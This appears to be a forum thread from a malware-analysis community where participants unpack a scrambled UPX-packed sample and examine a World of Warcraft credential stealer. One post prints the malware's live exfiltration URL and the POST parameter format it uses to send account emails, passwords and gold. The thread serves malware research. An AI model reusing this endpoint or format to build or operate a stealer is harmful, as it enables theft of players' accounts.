[rinn]

It's really UPX. Just a bit scrambled. In attach unpacked, all interesting dll's inside in rsrc section. Even if upx -d failed you still can unpack it manually.

Did you figure what makes upx -d failing?

Yes. It doesn't like .Silvana section (that owns import), likely added by scrambler. It does nothing and only added to confuse UPX canUnpack() or whatever.

Cut off Silvana section from file, correct size of image in header
Restore Image Directory Import pointer
upx -d

Best Regards,
-rin

[Win32:Virut]

https://www.virustotal.com/en/file/e216 ... 388939579/
https://www.virustotal.com/en/file/4879 ... 388939595/
https://www.virustotal.com/en/file/2833 ... 388939618/
https://www.virustotal.com/en/file/336c ... 388939619/

[Xartrick]

Did you figure what makes upx -d failing?

Yes. It doesn't like .Silvana section (that owns import), likely added by scrambler. It does nothing and only added to confuse UPX canUnpack() or whatever.

Cut off Silvana section from file, correct size of image in header
Restore Image Directory Import pointer
upx -d

Best Regards,
-rin

Thanks.

I go deeper, and found some interesting stuff.
The gate that receive the user's information still alive.

Code: Select all

hxxp://98.126.170.154/wow/wow.asp

It calls it with POST parameters:

Code: Select all

&WOWID=%s&Area=%s&WU=%s&WP=%s&MAX=%d/%d&Gold=%d&Serv=%s&rn=%s&key=%s

Code: Select all

WOWID => Wx32 (always (should be Wx64 for the x64 version))
Area => us or eu
WU => Account mail?
WP => Account password?
MAX => ?/?
Gold => Gold :)
Serv => Current server
rn => ?
key => ?

[Win32:Virut]

https://www.virustotal.com/en/file/98f0 ... 389009214/
https://www.virustotal.com/en/file/a149 ... 389009243/
https://www.virustotal.com/en/file/ea99 ... 389009264/
https://www.virustotal.com/en/file/1356 ... 389009182/